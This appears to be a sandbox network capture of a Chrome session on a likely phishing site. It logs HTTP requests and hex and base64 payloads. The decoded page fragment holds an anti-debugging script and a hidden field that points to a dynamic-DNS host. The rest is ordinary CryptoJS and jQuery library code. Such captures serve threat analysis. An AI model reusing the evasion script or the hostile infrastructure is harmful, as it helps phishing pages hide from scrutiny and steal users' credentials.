                                                                              2024-10-03 01:13:55 UTC1369INData Raw: 37 62 57 46 79 5a 32 6c 75 4c 58 52 76 63 44 6f 67 4c 6a 56 79 5a 57 30 37 66 51 30 4b 49 43 41 67 49 44 77 76 63 33 52 35 62 47 55 2b 44 51 6f 67 49 43 41 67 50 48 4e 6a 63 6d 6c 77 64 44 34 4e 43 69 41 67 49 43 42 7a 5a 58 52 4a 62 6e 52 6c 63 6e 5a 68 62 43 67 6f 4b 53 41 39 50 69 42 37 44 51 6f 67 49 43 41 67 59 32 39 75 63 33 51 67 64 44 41 67 50 53 42 45 59 58 52 6c 4c 6d 35 76 64 79 67 70 4f 77 30 4b 49 43 41 67 49 47 56 32 59 57 77 6f 4a 32 52 6c 59 6e 56 6e 5a 32 56 79 4a 79 6b 37 44 51 6f 67 49 43 41 67 59 32 39 75 63 33 51 67 64 44 45 67 50 53 42 45 59 58 52 6c 4c 6d 35 76 64 79 67 70 4f 77 30 4b 49 43 41 67 49 48 30 73 49 44 45 77 4d 44 41 70 4f 77 30 4b 49 43 41 67 49 44 77 76 63 32 4e 79 61 58 42 30 50 67 30 4b 50 43 39 6f 5a 57 46 6b 50 67
                                                                              Data Ascii: 7bWFyZ2luLXRvcDogLjVyZW07fQ0KICAgIDwvc3R5bGU+DQogICAgPHNjcmlwdD4NCiAgICBzZXRJbnRlcnZhbCgoKSA9PiB7DQogICAgY29uc3QgdDAgPSBEYXRlLm5vdygpOw0KICAgIGV2YWwoJ2RlYnVnZ2VyJyk7DQogICAgY29uc3QgdDEgPSBEYXRlLm5vdygpOw0KICAgIH0sIDEwMDApOw0KICAgIDwvc2NyaXB0Pg0KPC9oZWFkPg
                                                                              2024-10-03 01:13:55 UTC1369INData Raw: 64 6d 46 73 64 57 55 39 49 6d 68 30 64 48 42 7a 4f 69 38 76 5a 47 4e 30 62 32 39 73 63 79 35 74 62 32 39 76 4c 6d 4e 76 62 53 38 69 50 67 30 4b 50 43 45 74 4c 53 41 38 5a 47 6c 32 50 6c 52 6f 5a 53 42 79 62 32 46 6b 49 48 52 76 49 48 4e 31 59 32 4e 6c 63 33 4d 67 59 57 35 6b 49 48 52 6f 5a 53 42 79 62 32 46 6b 49 48 52 76 49 47 5a 68 61 57 78 31 63 6d 55 67 59 58 4a 6c 49 47 46 73 62 57 39 7a 64 43 42 6c 65 47 46 6a 64 47 78 35 49 48 52 6f 5a 53 42 7a 59 57 31 6c 4c 6a 77 76 5a 47 6c 32 50 69 41 74 4c 54 34 4b 50 47 6c 75 63 48 56 30 49 48 52 35 63 47 55 39 49 6d 68 70 5a 47 52 6c 62 69 49 67 61 57 51 39 49 6d 4a 73 64 47 52 31 59 53 49 67 62 6d 46 74 5a 54 30 69 59 6d 78 30 5a 48 56 68 49 69 42 32 59 57 78 31 5a 54 30 69 56 57 35 72 62 6d 39 33 62 69 49
                                                                              Data Ascii: dmFsdWU9Imh0dHBzOi8vZGN0b29scy5tb29vLmNvbS8iPg0KPCEtLSA8ZGl2PlRoZSByb2FkIHRvIHN1Y2Nlc3MgYW5kIHRoZSByb2FkIHRvIGZhaWx1cmUgYXJlIGFsbW9zdCBleGFjdGx5IHRoZSBzYW1lLjwvZGl2PiAtLT4KPGlucHV0IHR5cGU9ImhpZGRlbiIgaWQ9ImJsdGR1YSIgbmFtZT0iYmx0ZHVhIiB2YWx1ZT0iVW5rbm93biI


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              8192.168.2.449763192.185.163.424438044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:13:54 UTC351OUTGET /favicon.ico HTTP/1.1
                                                                              Host: dctools.mooo.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-03 01:13:55 UTC176INHTTP/1.1 200 OK
                                                                              Date: Thu, 03 Oct 2024 01:13:55 GMT
                                                                              Server: Apache
                                                                              Upgrade: h2,h2c
                                                                              Connection: Upgrade, close
                                                                              Content-Length: 0
                                                                              Content-Type: text/html; charset=UTF-8


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              9192.168.2.449766104.17.24.144438044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:13:55 UTC651OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                              Host: cdnjs.cloudflare.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: script
                                                                              Referer: https://ge6j.sisbousim.ru/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-03 01:13:56 UTC930INHTTP/1.1 200 OK
                                                                              Date: Thu, 03 Oct 2024 01:13:55 GMT
                                                                              Content-Type: application/javascript; charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Access-Control-Allow-Origin: *
                                                                              Cache-Control: public, max-age=30672000
                                                                              ETag: W/"61182885-40eb"
                                                                              Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                              cf-cdnjs-via: cfworker/kv
                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                              Timing-Allow-Origin: *
                                                                              X-Content-Type-Options: nosniff
                                                                              CF-Cache-Status: HIT
                                                                              Age: 529537
                                                                              Expires: Tue, 23 Sep 2025 01:13:55 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IgN3tSIXt6LSooc%2BS9bg6tCG7YS405qVCFsxF%2BkYBmHRe5gmhdTgFFyQCbwY6Z9OuF6CMfypN7BajzQzihVLgNCaYrQkfVF4LGHGrWrZn43GVD3wK6vUU%2BNlKo%2BbpXzfmvKTaYZE"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                              Strict-Transport-Security: max-age=15780000
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cc9128ceae30f4b-EWR
                                                                              2024-10-03 01:13:56 UTC439INData Raw: 37 62 66 35 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                              Data Ascii: 7bf5!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                              2024-10-03 01:13:56 UTC1369INData Raw: 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 7c 7c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 70 72 6f
                                                                              Data Ascii: to?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.pro
                                                                              2024-10-03 01:13:56 UTC1369INData Raw: 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 28 34 29 2e
                                                                              Data Ascii: s.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)try{return i.randomBytes(4).
                                                                              2024-10-03 01:13:56 UTC1369INData Raw: 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63 3b 61 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 28 69 2c
                                                                              Data Ascii: data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a+=o)this._doProcessBlock(i,
                                                                              2024-10-03 01:13:56 UTC1369INData Raw: 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 35 5d 3d 65 5b 35 5d 2b 38 38 36 32 36 33 30 39 32 2b
                                                                              Data Ascii: <8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>0?1:0)|0,e[5]=e[5]+886263092+
                                                                              2024-10-03 01:13:56 UTC1369INData Raw: 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 33 5d 3d 49 5b 33 5d 2b 28 49 5b 32 5d 3c 3c 38 7c
                                                                              Data Ascii: [r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0]>>>16)|0,t[3]=I[3]+(I[2]<<8|
                                                                              2024-10-03 01:13:56 UTC1369INData Raw: 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 77 6f 72 64 73 2c
                                                                              Data Ascii: t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:function(t){for(var e=t.words,
                                                                              2024-10-03 01:13:56 UTC1369INData Raw: 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73
                                                                              Data Ascii: .indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrs
                                                                              2024-10-03 01:13:56 UTC1369INData Raw: 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73 2e 5f 68 61 73 68 2e 77 6f 72 64 73 2c 73 3d 74 5b 65 2b 30 5d 2c 63 3d 74 5b 65 2b
                                                                              Data Ascii: tend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this._hash.words,s=t[e+0],c=t[e+
                                                                              2024-10-03 01:13:56 UTC1369INData Raw: 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b 35 30 5d 29 2c 62 3d 44 28 62 2c 78 2c 53 2c 6d 2c 66 2c 32 31 2c 41 5b 35 31 5d 29
                                                                              Data Ascii: S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[50]),b=D(b,x,S,m,f,21,A[51])


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              10192.168.2.449764151.101.2.1374438044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:13:55 UTC623OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                              Host: code.jquery.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: script
                                                                              Referer: https://ge6j.sisbousim.ru/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-03 01:13:56 UTC612INHTTP/1.1 200 OK
                                                                              Connection: close
                                                                              Content-Length: 89501
                                                                              Server: nginx
                                                                              Content-Type: application/javascript; charset=utf-8
                                                                              Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                              ETag: "28feccc0-15d9d"
                                                                              Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                              Access-Control-Allow-Origin: *
                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                              Via: 1.1 varnish, 1.1 varnish
                                                                              Accept-Ranges: bytes
                                                                              Date: Thu, 03 Oct 2024 01:13:55 GMT
                                                                              Age: 4109818
                                                                              X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890077-NYC
                                                                              X-Cache: HIT, HIT
                                                                              X-Cache-Hits: 55, 11
                                                                              X-Timer: S1727918036.984598,VS0,VE0
                                                                              Vary: Accept-Encoding
                                                                              2024-10-03 01:13:56 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                              Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                              2024-10-03 01:13:56 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                              Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                              2024-10-03 01:13:56 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
